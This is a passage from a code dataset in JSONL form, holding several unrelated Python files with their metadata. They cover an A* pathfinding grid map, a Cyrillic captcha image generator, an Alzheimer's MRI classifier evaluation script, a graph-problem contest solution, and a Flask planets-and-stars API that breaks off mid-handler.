"line_number": 293, "usage_type": "name"}, {"api_name": "mrcnn.model.MaskRCNN", "line_number": 301, "usage_type": "call"}, {"api_name": "mrcnn.model", "line_number": 301, "usage_type": "name"}, {"api_name": "imgaug.augmenters.SomeOf", "line_number": 309, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 309, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Fliplr", "line_number": 310, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 310, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Affine", "line_number": 311, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 311, "usage_type": "name"}, {"api_name": "imgaug.augmenters.Multiply", "line_number": 317, "usage_type": "call"}, {"api_name": "imgaug.augmenters", "line_number": 317, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 335, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 346, "usage_type": "call"}, {"api_name": "errno.ENOENT", "line_number": 354, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 360, "usage_type": "call"}, {"api_name": "os.path", "line_number": 360, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 362, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 369, "usage_type": "call"}, {"api_name": "os.path", "line_number": 369, "usage_type": "attribute"}, {"api_name": "mrcnn.model.MaskRCNN", "line_number": 385, "usage_type": "call"}, {"api_name": "mrcnn.model", "line_number": 385, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 414, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 414, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 418, "usage_type": "call"}, {"api_name": "mrcnn.model.load_image_gt", "line_number": 421, "usage_type": "call"}, {"api_name": "mrcnn.model", "line_number": 421, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 425, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot", "line_number": 425, "usage_type": "name"}, {"api_name": "mrcnn.visualize.display_instances", "line_number": 426, "usage_type": "call"}, {"api_name": "mrcnn.visualize", "line_number": 426, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 430, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 430, "usage_type": "name"}, {"api_name": "mrcnn.visualize.display_instances", "line_number": 433, "usage_type": "call"}, {"api_name": "mrcnn.visualize", "line_number": 433, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 455, "usage_type": "call"}, {"api_name": "pydicom.read_file", "line_number": 456, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 460, "usage_type": "call"}, {"api_name": "mrcnn.utils.resize_image", "line_number": 461, "usage_type": "call"}, {"api_name": "mrcnn.utils", "line_number": 461, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path", "line_number": 468, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 468, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 505, "usage_type": "call"}, {"api_name": "os.path", "line_number": 505, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 512, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 527, "usage_type": "call"}, {"api_name": "pydicom.read_file", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 538, "usage_type": "call"}, {"api_name": "mrcnn.utils.resize_image", "line_number": 539, "usage_type": "call"}, {"api_name": "mrcnn.utils", "line_number": 539, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 546, "usage_type": "call"}, {"api_name": "os.path", "line_number": 546, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 546, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 557, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 561, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 561, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 562, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 562, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 562, "usage_type": "attribute"}, {"api_name": "mrcnn.visualize", "line_number": 564, "usage_type": "call"}]} +{"seq_id": "23709131351", "text": "from random import randint\nfrom enum import Enum\n\nclass MAP_ENTRY_TYPE(Enum): # это перечисление определяет различные типы ячеек, которые могут присутствовать на карте.\n\tMAP_EMPTY = 0,\n\tMAP_BLOCK = 1,\n\tMAP_TARGET = 2,\n\tMAP_PATH = 3,\n\nclass WALL_DIRECTION(Enum): # это перечисление определяет различные направления, в которых может быть обращена стена.\n\tWALL_LEFT = 0,\n\tWALL_UP = 1,\n\tWALL_RIGHT = 2,\n\tWALL_DOWN = 3,\n\t\nmap_entry_types = {0:MAP_ENTRY_TYPE.MAP_EMPTY, 1:MAP_ENTRY_TYPE.MAP_BLOCK, 2:MAP_ENTRY_TYPE.MAP_TARGET, 3:MAP_ENTRY_TYPE.MAP_PATH}\n# сопоставляет целочисленные значения с элементами перечисления MAP_ENTRY_TYPE. 
\n# Это используется методом getType для преобразования целочисленного значения ячейки в соответствующее значение MAP_ENTRY_TYPE.\nclass Map():\n\tdef __init__(self, width, height): \n\t\tself.width = width\n\t\tself.height = height\n\t\tself.map = [[0 for x in range(self.width)] for y in range(self.height)]\n# конструктор класса Map, который инициализирует ширину и высоту карты и создает пустую двумерную сетку ячеек с указанными размерами.\t\n\tdef generatePos(self, rangeX, rangeY):\n\t\tx, y = (randint(rangeX[0], rangeX[1]), randint(rangeY[0], rangeY[1]))\n\t\twhile self.map[y][x] == 1:\n\t\t\tx, y = (randint(rangeX[0], rangeX[1]), randint(rangeY[0], rangeY[1]))\n\t\treturn (x , y)\n# этот метод генерирует случайную позицию (x, y) в пределах указанного диапазона значений x и y. \n# Он продолжает генерировать новые случайные позиции, пока не найдет ту, которая не является заблокированной ячейкой (т. е. ячейкой со значением 1).\t\n\tdef resetMap(self, value):\n\t\tfor y in range(self.height):\n\t\t\tfor x in range(self.width):\n\t\t\t\tself.setMap(x, y, value)\n# этот метод сбрасывает всю карту, устанавливая для всех ячеек указанное значение.\n\tdef setMap(self, x, y, value):\n\t\tif value == MAP_ENTRY_TYPE.MAP_EMPTY:\n\t\t\tself.map[y][x] = 0\n\t\telif value == MAP_ENTRY_TYPE.MAP_BLOCK:\n\t\t\tself.map[y][x] = 1\n\t\telif value == MAP_ENTRY_TYPE.MAP_TARGET:\n\t\t\tself.map[y][x] = 2\n\t\telse:\n\t\t\tself.map[y][x] = 3\n# этот метод устанавливает значение ячейки в позиции (x, y) на указанное значение.\n\tdef isVisited(self, x, y):\n\t\treturn self.map[y][x] != 1\n# этот метод возвращает True, если ячейка в позиции (x, y) не была посещена (т. е. ее значение не равно 1), и False в противном случае.\n\tdef isMovable(self, x, y):\n\t\treturn self.map[y][x] != 1\n# этот метод возвращает True, если ячейка в позиции (x, y) не является заблокированной ячейкой (т. е. 
ее значение не равно 1), и False в противном случае.\t\n# \t\n\tdef isValid(self, x, y):\n\t\tif x < 0 or x >= self.width or y < 0 or y >= self.height:\n\t\t\treturn False\n\t\treturn True\n# этот метод возвращает True, если позиция (x, y) находится в пределах границ карты, и False в противном случае.\t\n\tdef getType(self, x, y):\n\t\treturn map_entry_types[self.map[y][x]]\n# этот метод возвращает тип ячейки в позиции (x, y) как элемент перечисления MAP_ENTRY_TYPE.\n\tdef showMap(self):\n\t\tfor row in self.map:\n\t\t\ts = ''\n\t\t\tfor entry in row:\n\t\t\t\tif entry == 0:\n\t\t\t\t\ts += ' 0'\n\t\t\t\telif entry == 1:\n\t\t\t\t\ts += ' #'\n\t\t\t\telse:\n\t\t\t\t\ts += ' X'\n\t\t\tprint(s)\n# этот метод выводит карту на консоль с заблокированными ячейками, представленными '#', и всеми остальными ячейками, представленными символом пробела.\t", "repo_name": "NikitaBukreyev/algoritms", "sub_path": "lab2/a_star/GameMap.py", "file_name": "GameMap.py", "file_ext": "py", "file_size_in_byte": 4428, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "enum.Enum", "line_number": 4, "usage_type": "name"}, {"api_name": "enum.Enum", "line_number": 10, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 26, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "6767056735", "text": "# -*- coding: utf-8 -*-\n\nimport argparse\nimport json\nimport string\nimport os\nimport shutil\nimport uuid\nfrom captcha.image import ImageCaptcha\nimport codecs\nimport itertools\nimport random\n\nMETA_FILENAME = 'meta.json'\nSTRING_DATA = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\nFLAGS = None\n\ndef _gen_captcha(img_dir, n, width, height):\n #print('dir ' + img_dir)\n if os.path.exists(img_dir):\n shutil.rmtree(img_dir)\n if not os.path.exists(img_dir):\n os.makedirs(img_dir)\n\n print('n', n)\n font_files = ['63.ttf', '5751.ttf']\n image = ImageCaptcha(width=width, height=height, fonts=font_files)\n\n with open('russian.txt', 'r', encoding='UTF-8') as file:\n file_data = file.read().split('\\n')\n\n for _ in range(n):\n for i in file_data:\n captcha = ''.join(i)\n fn = os.path.join(img_dir, '%s_%s.png' % (captcha, uuid.uuid4()))\n image.write(captcha, fn)\n\n choices = STRING_DATA\n\n data = list(itertools.permutations(choices, 4))\n print(len(data))\n length = 10\n for _ in range(n):\n for i in range(length):#num_per_image\n x = random.choice(data)\n captcha = ''.join(x)\n fn = os.path.join(img_dir, '%s_%s.png' % (captcha, uuid.uuid4()))\n image.write(captcha, fn)\n\n\ndef build_file_path(data_dir, npi, n_epoch, x):\n return os.path.join(data_dir, 'char-%s-epoch-%s' % (npi, n_epoch), x)\n\n\ndef gen_dataset(data_dir, n_epoch, npi, test_ratio):\n width = 40 + 20 * npi#40 + x * 20\n height = 100#100\n\n # meta info\n meta = {\n 'num_per_image': npi,\n 'label_size': len(STRING_DATA),\n 'label_choices': STRING_DATA,\n 'n_epoch': n_epoch,\n 'width': width,\n 'height': height,\n }\n #print(meta)\n\n train_path = build_file_path(data_dir, npi, n_epoch, 'train')\n test_path = build_file_path(data_dir, npi, n_epoch, 'test')\n print(train_path, test_path)\n\n _gen_captcha(train_path, n_epoch, width, height)\n _gen_captcha(test_path, max(1, int(n_epoch * test_ratio)), width, height)\n\n meta_filename = build_file_path(data_dir, npi, n_epoch, META_FILENAME)\n\n print(meta)\n with codecs.open(meta_filename, 'w', encoding='UTF-8') as f:\n json.dump(meta, f, indent=4)\n print('write 
meta info in %s' % meta_filename)\n\n\nif __name__ == '__main__':\n data_dir = 'E:\\\\Python\\\\captcha-tensorflow\\\\datasets\\\\images'\n n_epoch = 2\n nip = 4\n ratio = 0.2\n\n gen_dataset(data_dir, n_epoch, nip, ratio)\n", "repo_name": "bakaInc/3d_catpcha_solve", "sub_path": "datasets/gen_captcha.py", "file_name": "gen_captcha.py", "file_ext": "py", "file_size_in_byte": 2528, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 23, "usage_type": "call"}, {"api_name": "captcha.image.ImageCaptcha", "line_number": 27, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "captcha.image", "line_number": 35, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 35, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 36, "usage_type": "argument"}, {"api_name": "itertools.permutations", "line_number": 40, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 45, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 46, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "captcha.image", "line_number": 47, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 47, "usage_type": "call"}, {"api_name": "captcha.image", "line_number": 48, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "codecs.open", "line_number": 80, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "20270456033", "text": "import numpy as np\r\nimport os\r\nimport nibabel as nib\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\n#In[1]:\r\n\r\n# - import test arrays (select path)\r\nX_test = np.load(\"/content/drive/MyDrive/TESE/Dados/teste_image_emci.npy\")\r\ny_test = np.load(\"/content/drive/MyDrive/TESE/Dados/teste_label_emci.npy\")\r\n\r\nprint (\"Dados de teste:\", len(X_test))\r\n\r\n\r\n#In[2]:\r\ntest_image = X_test\r\ntest_label = y_test\r\nprint(test_image.shape)\r\n\r\n\r\n#In[3]:\r\nbatch_size = 3\r\ntest_loader = tf.data.Dataset.from_tensor_slices((X_test, y_test))\r\n\r\ndef test_preprocessing(volume, label):\r\n \"\"\"Process test data by only adding a channel and covert to rgb.\"\"\"\r\n volume = tf.expand_dims(volume, axis=3)\r\n volume=tf.image.grayscale_to_rgb(volume)\r\n return volume, label\r\n\r\n# - do not shuffle the test dataset \r\ntest_dataset = (\r\n test_loader.map(test_preprocessing)\r\n .batch(batch_size)\r\n .prefetch(2)\r\n)\r\n\r\n#In[4]:\r\n\r\n\r\n# - import the trained model\r\nfinal_model = 
keras.models.load_model('/content/drive/MyDrive/TESE/Final_class/seresnet152_final_emci.h5')\r\n\r\nfinal_model.evaluate(test_dataset)\r\nfinal_predict = final_model.predict(test_dataset)\r\n\r\nprint(final_predict)\r\n\r\npredict = (final_predict > 0.5).astype('int')\r\n\r\nprint(predict)\r\nprint(test_label)\r\n\r\n# - create an array with the desired labels \r\nlabels_multi=np.array([\"CN\", \"EMCI\", \"LMCI\", \"AD\"])\r\nlabels_bi=np.array([\"CN\", \"AD\"])\r\n\r\n#In[5]:\r\nfrom sklearn.metrics import accuracy_score, ConfusionMatrixDisplay, classification_report, roc_auc_score, roc_curve\r\nimport matplotlib.pyplot as plt\r\n\r\n#MULTICLASS\r\nConfusionMatrixDisplay.from_predictions(test_label.argmax(axis=1), predict.argmax(axis=1), display_labels=labels_multi, cmap=plt.cm.Blues)\r\n\r\n#BINARYCLASS\r\nConfusionMatrixDisplay.from_predictions(test_label, predict,display_labels=labels_bi, cmap=plt.cm.Blues)\r\n\r\n\r\n\r\n#In[6]:\r\nimport matplotlib.pyplot as plt\r\n\r\ndef plot_roc_curve(true_y, y_prob):\r\n\r\n fpr, tpr, thresholds = roc_curve(true_y, y_prob)\r\n plt.plot(fpr, tpr, label='Model')\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n\r\nplot_roc_curve(test_label, final_predict)\r\nprint(f'Model AUC score: {roc_auc_score(test_label, final_predict)}')\r\n\r\n\r\n\r\n\r\n#In[7]:\r\n\r\nhistory = pd.read_csv('/content/drive/MyDrive/TESE/Final_class/seresnet152_lmci___.csv')\r\nprint(history)\r\n\r\n\r\n#In[8]:\r\n\r\n# - Loss plot\r\nplt.plot(history['loss'], label= 'Training Loss')\r\nplt.plot(history['val_loss'], label= 'Validation Loss')\r\nplt.legend()\r\nplt.show()\r\n\r\n# - Accuracy plot\r\nplt.plot(history['binary_accuracy'], label= 'Training Accuracy')\r\nplt.plot(history['val_binary_accuracy'], label= 'Validation Accuracy')\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n#In[9]:\r\n\r\n#MULTICLASS\r\nprint(\"Test Accuracy : {}\".format(accuracy_score(test_label, predict)))\r\nprint(\"\\nClassification Report :\")\r\nprint(classification_report(test_label, predict, target_names=['CN', 'EMCI', 'LMCI','AD']))\r\n\r\n#BINARYCLASS\r\nprint(\"Test Accuracy : {}\".format(accuracy_score(test_label, predict)))\r\nprint(\"\\nClassification Report :\")\r\nprint(classification_report(test_label, predict, target_names=['CN', 'AD']))\r\n\r\n", "repo_name": "MarianaCoelho9/Alzheimer-Detection", "sub_path": "Test_model.py", "file_name": "Test_model.py", "file_ext": "py", "file_size_in_byte": 3137, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.load", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 12, "usage_type": "call"}, {"api_name": "tensorflow.data.Dataset.from_tensor_slices", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.expand_dims", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.image.grayscale_to_rgb", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.keras.models", "line_number": 44, "usage_type": "attribute"}, {"api_name": "tensorflow.keras", "line_number": 44, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": 
"call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay.from_predictions", "line_number": 65, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 65, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay.from_predictions", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.metrics.ConfusionMatrixDisplay", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 68, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 83, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 114, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 117, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 119, "usage_type": "call"}]} +{"seq_id": "31635186798", "text": "# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nimport sys\nread = 
sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\nfrom heapq import heappop,heappush\nfrom collections import defaultdict\n\nn,m = map(int,readline().split())\nab = list(map(int,read().split()))\n\n####################\nimport sys\nsys.setrecursionlimit(10**6)\n\nclass UnionFind():\n def __init__(self, n):\n self.n = n\n self.parents = [-1] * n\n\n def find(self,x):\n if(self.parents[x] < 0):\n return x\n self.parents[x] = self.find(self.parents[x])\n return self.parents[x]\n\n def size(self, x):\n return self.parents[ self.find(x) ] * -1\n\n def same(self, x, y):\n x_root = self.find(x)\n y_root = self.find(y)\n return (x_root == y_root)\n\n def union(self,x,y):\n x_root = self.find(x)\n y_root = self.find(y)\n if(x_root == y_root):\n return\n\n if( self.parents[x_root] <= self.parents[y_root] ):\n self.parents[x_root] += self.parents[y_root]\n self.parents[y_root] = x_root\n else:\n self.parents[y_root] += self.parents[x_root]\n self.parents[x_root] = y_root\n\n def members(self,x):\n root = self.find(x)\n ret = [ i for i in range(self.n) if self.find(i) == root ]\n return ret\n\n def roots(self):\n ret = [ i for i in range(self.n) if self.parents[i] < 0]\n return ret\n\n def group_count(self):\n return len(self.roots())\n\n def all_group_members(self):\n return {r: self.members(r) for r in self.roots()}\n\nimport random\n\nn = 10\nremains = [set(range(n)) for _ in range(n)]\nuf = UnionFind(n)\nedges = set()\nwhile(uf.size(0) < n):\n i = random.randint(0,n-1)\n # print(i)\n if(not remains[i]):\n continue\n js = list(remains[i])\n j = random.choice(js)\n # print(i,j)\n remains[i].remove(j)\n if(i==j):\n continue\n remains[j].remove(i)\n\n edges.add((i+1,j+1))\n uf.union(i,j)\n # print('add')\n # print(uf.parents)\n\n# print(edges)\n# print(len(edges))\n\nm = len(edges)\nab = []\nfor i,j in edges:\n ab.append(i)\n ab.append(j)\n\nprint(ab)\nprint(n,m)\n\n#####################\n\nif(m%2==1):\n print(-1)\n exit()\n\nit = iter(ab)\nlinks = [[] for _ in range(n+1)]\nfor a,b in zip(it,it):\n links[a].append(b)\n links[b].append(a)\n\nfor i,l in enumerate(links):\n print(i,l)\n\ndepth = [-1] * (n+1)\nparent = [0] * (n+1)\nchild = [set() for _ in range(n+1)]\nhq_dep = []\nd = defaultdict(int)\n\nstack = [1]\ndepth[1] = 0\nheappush(hq_dep, (0,1))\nnow_dep = 1\nwhile(stack):\n stack2 = []\n while(stack):\n i = stack.pop()\n for j in links[i]:\n if(depth[j] == -1):\n depth[j] = now_dep\n parent[j] = i\n d[i*10**6+j] = 1\n heappush(hq_dep,(now_dep*-1,j))\n stack2.append(j)\n else:\n child[j].add(i)\n now_dep += 1\n stack = stack2[::]\n\n# print(parent)\n# print(child)\n# print(d)\n# print(hq_dep)\n\nans = []\nfor _ in range(m//2):\n while(True):\n i_dep,i= hq_dep[0]\n if(parent[i]==0):\n heappop(hq_dep)\n else:\n break\n\n if(child[i]):\n j = child[i].pop()\n if(child[i]):\n k = child[i].pop()\n else:\n k = parent[i]\n parent[i] = 0\n\n if(parent[j]==i):\n parent[j] = 0\n else:\n child[j].remove(i)\n if(parent[k]==i):\n parent[k] = 0\n else:\n child[k].remove(i)\n\n ans.append((i,j))\n ans.append((i,k))\n\n\n else:\n j = parent[i]\n child[j].remove(i)\n heappop(hq_dep)\n if(child[j]):\n k = child[j].pop()\n else:\n k = parent[j]\n parent[j] = 0\n if(parent[k]==j):\n parent[k] = 0\n else:\n print(k,j)\n print(parent)\n print(child)\n child[k].remove(j)\n\n ans.append((j,i))\n ans.append((j,k))\n\n\nprint('\\n'.join(map(lambda x: ' '.join(map(str,x)), ans)))\n\n\n\n\n'''\n端点から決めていけば確定する?\n\n閉路どうしよう問題\nK5とか。\n\n先に閉路?\n\n偶数長の道は処理できる。\n\n二部グラフである必要ある?\n→ 
ない\n\n\n一本出たら、もう一本出さないといけない。\n\n2辺消して、継続できればOK?\n\n頂点数奇数の木はいける\n\n\n木がいけるのにグラフがいけないことある?\n→ 全体の連結を保ったまま辺を除いていければよい\n\n根を決めておいて、一番遠いところから処理すればよい?\n\n頂点深さのheapqを持つ\n一番深い頂点をとる。\n端点じゃなければ、2辺取る。\n\n端点なら1辺とって、行った先か一番深いところへ行く\n\nこれを繰り返せばOKでは?\n\n'''\n", "repo_name": "komajun365/competitive_programming", "sub_path": "agc/agc035_old/b2.py", "file_name": "b2.py", "file_ext": "py", "file_size_in_byte": 5221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.stdin", "line_number": 15, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.setrecursionlimit", "line_number": 29, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 85, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 90, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 133, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 137, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 148, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 165, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 193, "usage_type": "call"}]} +{"seq_id": "10657536490", "text": "import os\nimport sys\nfrom models import db, setup_db, Planets, Stars\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nfrom auth import AuthError, requires_auth\n\n\ndef create_app(test_config=None):\n\n app = Flask(__name__)\n setup_db(app)\n CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers',\n 'Content-Type, Authorization')\n response.headers.add('Access-Control-Allow-Methods',\n 'GET, POST, PATCH, DELETE, OPTIONS')\n return response\n\n @app.route(\"/\")\n def index():\n return jsonify({\"status\": \"Hey I'm working\"})\n\n '''planets'''\n\n @app.route(\"/planets\")\n @requires_auth('get:planets')\n def get_planets(payload):\n error = False\n try:\n get_planets = Planets.query.all()\n planets = []\n for planet in get_planets:\n planets.append({\n 'id': planet.id,\n 'name': planet.name,\n 'moons_number': planet.moons_number\n })\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'planets': planets\n })\n\n @app.route(\"/planets\", methods=[\"POST\"])\n @requires_auth('post:planets')\n def add_planet(payload):\n error = False\n try:\n name = request.get_json()['name']\n moons_number = request.get_json()['moonsNumber']\n add = Planets(\n name=name,\n moons_number=moons_number\n )\n add.insert()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True,\n 'name': name,\n 'moons_number': moons_number\n })\n\n @app.route('/planets/', methods=['DELETE'])\n @requires_auth('delete:planets')\n def del_planets(payload, planet_id):\n error = False\n try:\n planets = Planets.query.filter_by(id=planet_id).first()\n planets.delete()\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'success': True\n })\n\n @app.route('/planets/', methods=[\"PATCH\"])\n @requires_auth('patch:planets')\n def patch_planets(payload, planet_id):\n error = False\n get_planets = 
Planets.query.filter_by(id=planet_id).first()\n try:\n name = request.get_json()[\"name\"]\n moons_number = request.get_json()[\"moonsNumber\"]\n get_planets.name = name\n get_planets.moons_number = moons_number\n get_planets.update()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True\n })\n\n '''stars'''\n\n @app.route(\"/stars\")\n @requires_auth('get:stars')\n def stars(payload):\n error = False\n try:\n get_stars = Stars.query.all()\n stars = []\n for star in get_stars:\n stars.append({\n 'id': star.id,\n 'name': star.name,\n 'age': star.age\n })\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'stars': stars})\n\n @app.route(\"/stars\", methods=[\"POST\"])\n @requires_auth('post:stars')\n def add_stars(payload):\n error = False\n try:\n name = request.get_json()['name']\n age = request.get_json()['age']\n add = Stars(\n name=name,\n age=age\n )\n add.insert()\n except:\n error = True\n finally:\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True,\n 'name': name,\n 'age': age\n })\n\n @app.route('/stars/', methods=['DELETE'])\n @requires_auth('delete:stars')\n def del_stars(payload, star_id):\n error = False\n stars = Stars.query.filter_by(id=star_id).first()\n try:\n stars.delete()\n except:\n error = True\n finally:\n if error:\n abort(404)\n else:\n return jsonify({\n 'success': True\n })\n\n @app.route('/stars/', methods=['PATCH'])\n @requires_auth('patch:stars')\n def patch_stars(payload, star_id):\n error = False\n 